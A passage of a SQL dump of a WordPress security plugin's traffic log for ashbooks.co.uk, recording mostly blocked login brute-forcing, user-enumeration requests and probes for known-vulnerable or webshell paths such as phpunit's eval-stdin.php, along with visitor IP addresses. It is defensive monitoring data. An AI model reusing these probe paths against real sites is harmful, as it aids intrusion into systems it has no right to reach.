Safari\\/537.36\"}','I8KW1dX0iwyTPGQjFSBfMJYo',0,1637972241.3623,468,'','POST',403,0,600,0,1,'',0),('159.65.238.248',2671898360,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','5uJp9BnUQDodrZ4ATzecbmSk',0,1637972534.7267,463,'','POST',403,0,600,0,1,'',0),('208.113.160.8',3497107464,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','XEJtBPhc7gbZxzASlN3D0IHK',0,1637973570.5796,368,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 Safari\\/537.36\"}','qjxEuV4MkNh0cQvLbWIA7yZl',0,1637974363.5105,474,'','POST',403,0,600,0,1,'',0),('95.217.3.203',1608057803,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','4ZDIWQOvwtRK2BbmLp1FUAi7',0,1637974686.4805,546,'','POST',403,0,600,0,1,'',0),('159.65.146.8',2671874568,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','YmiBEs0nOwJz9KxNfUelay2A',0,1637975825.1013,544,'','POST',403,0,600,0,1,'',0),('193.148.164.26',3247744026,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','6cE7X39oLnpiehYDqdtQmIrj',0,1637976822.4205,426,'','POST',403,0,600,0,1,'',0),('119.8.119.224',1997043680,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','HS0NBzgPhsAGEVQ8O34UiFne',0,1637977868.7975,721,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','Gd2zImOpao7qstXTSgYbyVZ0',0,1637978703.6583,575,'','POST',403,0,600,0,1,'',0),('220.132.196.5',3699688453,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','ZqG6fDbi9VOzSNeT7r0c5Khs',0,1637978961.0292,499,'','POST',403,0,600,0,1,'',0),('62.182.159.89',1052155737,'','https://ashbooks.co.uk/wp-includes/wp-class.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','b4ziuWSMsaN7FH0k8AdhD3px',0,1637979790.5307,5372,'','GET',403,0,700,0,1,'',0),('81.88.52.163',1364735139,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','nApzN4hXWPeJSaljb0uBVZO7',0,1637980055.5828,809,'','POST',403,0,600,0,1,'',0),('156.38.216.210',2619791570,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','q5IaJNODyjihBwz6LxngXWdE',0,1637981063.7389,580,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','ZnvN61XWxyLtMrwP9mD2p47z',0,1637983065.4099,537,'','POST',403,0,600,0,1,'',0),('65.108.51.66',1097610050,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','RW16p25qZQsjXL4AMHmKO9zF',0,1637983168.9451,681,'','POST',403,0,600,0,1,'',0),('137.184.13.134',2310540678,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','qhw80jpbLAoBc2CiGJ9IuVTs',0,1637984149.8758,469,'','POST',403,0,600,0,1,'',0),('185.2.4.44',3103917100,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','xTSwPBUGJAHi1DOplNYLkyCI',0,1637985114.0771,441,'','POST',403,0,600,0,1,'',0),('109.168.97.89',1839751513,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','ZNe2pC68KbrTyMOdGU3FiahD',0,1637986214.4062,821,'','POST',403,0,600,0,1,'',0),('93.113.111.54',1567715126,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','CThrypXOQYvsMKlkRLmJ7qGd',0,1637987185.0565,1516,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','cjaTLqJAMzEHxXpBiS1sRdU7',0,1637987431.1170,575,'','POST',403,0,600,0,1,'',0),('78.47.116.216',1311732952,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','p1raE36YUgc0vZwtNb2CHsSf',0,1637988218.7158,443,'','POST',403,0,600,0,1,'',0),('194.163.133.151',3265496471,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','iLcbymY7s4Q9K8uWExjdJoU2',0,1637989259.2083,496,'','POST',403,0,600,0,1,'',0),('67.205.11.6',1137511174,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','fmxkCKpuXbsMWwYaRdOcJ5vP',0,1637990490.0303,723,'','POST',403,0,600,0,1,'',0),('27.65.40.197',457255109,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','0MlP2dHJYkrDW3jyazIUqSoi',0,1637991596.4499,488,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 Safari\\/537.36\"}','WplsDv2ZRIA0ENqkhmiYSwdy',0,1637991772.2772,784,'','POST',403,0,600,0,1,'',0),('212.192.241.6',3569414406,'','https://ashbooks.co.uk/emergency.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','lFnXZIN165Vuh2aYRebzBDWj',0,1637992504.5946,512,'','GET',403,0,700,0,1,'',0),('212.192.241.6',3569414406,'','https://ashbooks.co.uk/wp-content/themes/wp-update.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','UCGRMI6157sdPF4axfThJelK',0,1637992576.1341,409,'','GET',403,0,700,0,1,'',0),('220.167.101.24',3701957912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','bqXm8fOSKl7sgCivaUQ3hzuF',0,1637992597.2868,185,'','POST',403,0,600,0,1,'',0),('69.30.231.155',1159653275,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','UHBKCsW78ck1QmNYzSAjeGu5',0,1637992745.5909,216,'','POST',403,0,600,0,1,'',0),('185.2.4.71',3103917127,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','R0ZFhA3eHsBNtSEVzCbrTnxw',0,1637994702.1273,838,'','POST',403,0,600,0,1,'',0),('143.198.162.183',2412159671,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','O5CbkVvWnX9lMx1RmjYuZyBt',0,1637995653.9122,1292,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','QGblviWsktYJEn78F5CDu6od',0,1637996125.3289,2344,'','POST',403,0,600,0,1,'',0),('188.166.56.218',3165010138,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','34bPnSTYhWH8oIUCgvLDOFJt',0,1637996642.5012,761,'','POST',403,0,600,0,1,'',0),('128.199.190.211',2160574163,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','QW2jStuM5af9g8ozwEHdBn7e',0,1637997709.9484,483,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 Safari\\/537.36\"}','am1WlZV9JpoDFxtA8407YLOC',0,1638000471.6317,636,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','yN6WnZm0vjwLp3BaxzQeTUK9',0,1638004804.1828,614,'','POST',403,0,600,0,1,'',0),('106.51.242.201',1781789385,'','https://ashbooks.co.uk/index.php/wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','uUZJ2s7FlDd8WgzEMYqpmtBA',0,1638009234.3316,411,'','GET',403,0,520,0,1,'',0),('173.208.152.235',2916129003,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','mvEWzjAHltw632K9MJ4incNY',0,1638011130.2516,500,'','POST',403,0,600,0,1,'',0),('185.81.157.200',3109133768,'','https://ashbooks.co.uk/virtual-teams-how-to-sustain-high-performing-teams-in-the-virtual-workplace/dup-installer/main.installer.php','','{\"1\":\"Python-urllib\\/2.7\"}','0LYzfwuy5iEoGRAId7M6hBcJ',0,1638012497.9672,1993,'','GET',403,0,700,0,1,'',0),('185.67.34.1',3108184577,'','https://ashbooks.co.uk/restapi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','qGerdiSx4pJy385sIQFb7aE1',0,1638013101.4604,464,'','GET',403,0,700,0,1,'',0),('185.67.34.1',3108184577,'','https://ashbooks.co.uk/gate.php','','{\"1\":\"Dalvik\\/2.1.0 (Linux; U; Android 6.0.1; SM-J700F Build\\/MMB29K)\"}','TkgEhmW8QjORDGrI0iwXzaUu',0,1638013108.3604,411,'','POST',403,0,700,0,1,'',0),('185.67.34.1',3108184577,'','https://www.ashbooks.co.uk/restapi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','oBae48Xqmt1AsSH2UrOCPZ3L',0,1638013109.6255,475,'','GET',403,0,700,0,1,'',0),('185.67.34.1',3108184577,'','https://www.ashbooks.co.uk/gate.php','','{\"1\":\"Dalvik\\/2.1.0 (Linux; U; Android 6.0.1; SM-J700F Build\\/MMB29K)\"}','LSEkvAM2wJpIa6cUObeX8gxK',0,1638013111.6601,403,'','POST',403,0,700,0,1,'',0),('157.245.156.140',2650119308,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','6CDvdqciZ1RTrEXjI3PeSszl',0,1638013906.9006,180,'','GET',403,0,520,0,1,'',0),('35.225.94.95',601972319,'','https://www.ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/www.ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','irLuYAhMzQaBWjScnwqs5VEg',0,1638014311.0913,407,'','GET',403,0,520,0,1,'',0),('185.81.157.200',3109133768,'','https://ashbooks.co.uk/dup-installer/main.installer.php','','{\"1\":\"Python-urllib\\/2.7\"}','0G34xVBCuzhfP15tAqTsevWS',0,1638032189.2556,462,'','GET',403,0,700,0,1,'',0),('107.150.48.235',1805005035,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','6h3GBf2DYVsjHOJWpSI1t97z',0,1638033580.3515,382,'','POST',403,0,600,0,1,'',0),('69.30.225.182',1159651766,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','9hfrmNMePTxUco7wnKC4zIRZ',0,1638035193.6850,610,'','POST',403,0,600,0,1,'',0),('220.92.136.66',3697051714,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','MG4P8kxBRzf629itbswgYdQF',0,1638036360.1260,248,'','POST',403,0,600,0,1,'',0),('220.92.136.66',3697051714,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','sQIOZHknex0F6tMj7wCBAEzX',0,1638036362.9826,510,'','POST',403,0,600,0,1,'',0),('220.92.136.66',3697051714,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','YeBR71aromDibZMc2HUpPTz5',0,1638036365.5667,381,'','POST',403,0,600,0,1,'',0),('220.92.136.66',3697051714,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','ImyvfK7uzGVtlB4HkXCMFaoJ',0,1638036368.1529,373,'','POST',403,0,600,0,1,'',0),('220.92.136.66',3697051714,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','IbKdckF9JNuHto1ZgwzlBeqD',0,1638036370.6083,406,'','POST',403,0,600,0,1,'',0),('220.92.136.66',3697051714,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','NP6zV91THGc0pto5wnxsKgua',0,1638036374.2793,336,'','POST',404,0,700,0,1,'',0),('220.92.136.66',3697051714,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','N24iQs69WFwpcqoSZzfhGPl7',0,1638036376.5600,399,'','POST',404,0,700,0,1,'',0),('69.12.66.204',1158431436,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','zdHRutre1N3WwiGKonP5XVvT',0,1638038610.9698,366,'','GET',403,0,520,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','JHYoxMVtmbQ2sCrSWqwDUueF',0,1638039434.2438,504,'','POST',403,0,600,0,1,'',0),('204.12.198.242',3423389426,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit\\/600.1.3 (KHTML, like Gecko) Version\\/8.0 Safari\\/600.1.3\"}','a82MP5k3OeUAWnydv6uwEtbD',0,1638041581.8986,158,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 Safari\\/537.36\"}','TNm5FSEbDwX3J1tePAaKVQgO',0,1638045975.4769,583,'','POST',403,0,600,0,1,'',0),('190.22.62.84',3189128788,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit\\/534.10 (KHTML, like Gecko) Chrome\\/8.0.552.224 Safari\\/534.10\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','pDlTs5hFQGxBMSuYfCrb7tw2',0,1638048517.7783,401,'','POST',403,0,600,0,1,'',0),('190.22.62.84',3189128788,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit\\/534.10 (KHTML, like Gecko) Chrome\\/8.0.552.224 Safari\\/534.10\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','SuAzqyOcWkdYDVgpGasNKtCQ',0,1638048524.0063,442,'','POST',403,0,600,0,1,'',0),('190.22.62.84',3189128788,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit\\/534.10 (KHTML, like Gecko) Chrome\\/8.0.552.224 Safari\\/534.10\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','wroaWhTiqy4dP3Oj6VB5xe1N',0,1638048530.0772,431,'','POST',403,0,600,0,1,'',0),('46.161.27.142',782310286,'','https://ashbooks.co.uk/?rest_route=/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','S8eaDEdkGOUvX6Y70RNZAsTg',0,1638050808.8574,164,'','GET',403,0,520,0,1,'',0),('46.161.27.142',782310286,'','https://ashbooks.co.uk/wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','MuRPEJjUA4gSOiC6pf0k2xNL',0,1638050809.4217,143,'','GET',403,0,520,0,1,'',0),('46.161.27.142',782310286,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','hs2cqyVzB0bZ7DLPTFwCKMuX',0,1638050829.6850,410,'','POST',403,0,600,0,1,'',0),('46.161.27.142',782310286,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','TfHVrtFu69hWeOwKPiXUbgNn',0,1638050830.1825,428,'','POST',403,0,600,0,1,'',0),('46.161.27.142',782310286,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','2OCTm8Xw543NjvWK7LGuIV0h',0,1638050845.6840,445,'','POST',403,0,600,0,1,'',0),('46.161.27.142',782310286,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','oT0FP5alVYeuqZEh71BRUxi4',0,1638050861.1997,196,'','POST',403,0,600,0,1,'',0),('62.182.159.89',1052155737,'','https://ashbooks.co.uk/wp-content/plugins/fastest-cache/images/wp-load.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','T5xObAa1iSyVIRwCErhUdQBj',0,1638053395.0715,420,'','GET',403,0,700,0,1,'',0),('69.30.225.182',1159651766,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','rxcpgRGmQUfMYo7shIjNtJBy',0,1638057628.8037,899,'','POST',403,0,600,0,1,'',0),('185.191.34.215',3116311255,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','zhScI8YBMtVeQqXsTn3muFrN',0,1638070881.0518,572,'','GET',403,0,700,0,1,'',0),('204.12.198.242',3423389426,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','aONYVFwEpBiJ7gefvsn9X4oU',0,1638080513.5816,220,'','POST',403,0,600,0,1,'',0),('23.228.109.147',400846227,'','https://ashbooks.co.uk/admin/php-ofc-library/ofc_upload_image.php','','{\"1\":\"ALittle Client\"}','fhJwBCbYjIamQM0gOHkE61Wo',0,1638089135.1163,499,'','GET',403,0,700,0,1,'',0),('185.220.100.253',3118228733,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko\\/20100101 Firefox\\/55.0\"}','F9kP7smpJHXwObS43viAYu8I',0,1638116512.7939,854,'','POST',403,0,600,0,1,'',0),('187.102.240.9',3144085513,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit\\/534.10 (KHTML, like Gecko) Chrome\\/8.0.552.224 Safari\\/534.10\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','fm0CTSjZ85rFsa2MtOiR7GzU',0,1638123152.3973,415,'','POST',403,0,600,0,1,'',0),('212.192.241.6',3569414406,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','jzgso3Ic1yRUHlDbVG0fJtph',0,1638126971.0954,375,'','GET',403,0,700,0,1,'',0);
INSERT INTO `cerber_traffic` VALUES ('212.192.241.6',3569414406,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','nXcWojPwCHAzSv1dGm4iReDE',0,1638126994.0047,358,'','GET',403,0,700,0,1,'',0),('155.94.222.11',2606685707,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\"}','vBY6Pq5m1LgahsJQTdie3DUy',0,1638140502.3183,418,'','GET',403,0,520,0,1,'',0),('147.182.198.71',2478229063,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.25.1\"}','XgTQSxopmq8CNnjizsKfwLO6',0,1638160039.6711,586,'','GET',403,0,700,0,1,'',0),('212.192.241.6',3569414406,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','IpgRZGX6yeVO0C3fi2KUzSat',0,1638163854.1327,450,'','GET',403,0,700,0,1,'',0),('212.192.241.6',3569414406,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','yeRZsK9t5h0ELibjOSwIBp7u',0,1638163889.3060,768,'','GET',403,0,700,0,1,'',0),('109.70.100.35',1833329699,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) 